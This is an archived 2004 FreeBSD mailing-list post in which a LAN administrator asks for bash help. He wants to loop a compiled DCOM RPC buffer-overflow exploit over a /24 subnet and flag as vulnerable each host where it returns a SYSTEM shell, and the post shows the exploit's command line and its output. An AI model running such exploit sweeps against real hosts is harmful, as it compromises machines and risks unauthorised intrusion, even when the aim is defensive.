Date: Tue, 16 Mar 2004 01:40:51 +0200 From: hugle <hugle@vkt.lt> To: freebsd-questions@freebsd.org Subject: Need bash help Message-ID: <130471393648.20040316014051@vkt.lt>
next in thread | raw e-mail | index | archive | help
Hello all. I'm writing here, cause i think just here people can help me. (p.s. didn't find bash mailing lists) So here's what I'm palnning to do.. I have big LAN in here, and noticed that lots of users are still exploitable using RPC. I've just found source of this exploit, compiled it, and tried to use - it works. What i'm planning to is automaticaly detect such users (exploitable). So i run : ftp# ./dc IP and get: --------------------------------------------------------- - Remote DCOM RPC Buffer Overflow Exploit - Original code by FlashSky and Benjurry - Rewritten by HDM <hdm [at] metasploit.com> - Using return address of 0x77e626ba - Dropping to System Shell... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> END. So if there is text like '- Dropping to System Shell...' means that system is vulderable. otherways it teturns: --------------------------------------------------------- - Remote DCOM RPC Buffer Overflow Exploit - Original code by FlashSky and Benjurry - Rewritten by HDM <hdm [at] metasploit.com> - Using return address of 0x77e626ba - Exploit appeared to have failed. So what I wanna do is smth like: for i in `seq 1 254`; do ./dc 192.168.1.$i and if it returns 'Dropping to system shell' then add these IP to vulderable_users done After i'm planning to block those users on my router, and forward them to the webpage with explanation on howto FIX that bug. Thanks for help in advance Jarek
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?130471393648.20040316014051>